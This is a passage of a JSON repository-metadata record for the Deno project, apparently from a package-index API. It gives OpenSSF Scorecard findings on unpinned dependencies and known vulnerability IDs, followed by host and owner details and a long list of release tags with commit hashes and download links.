https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@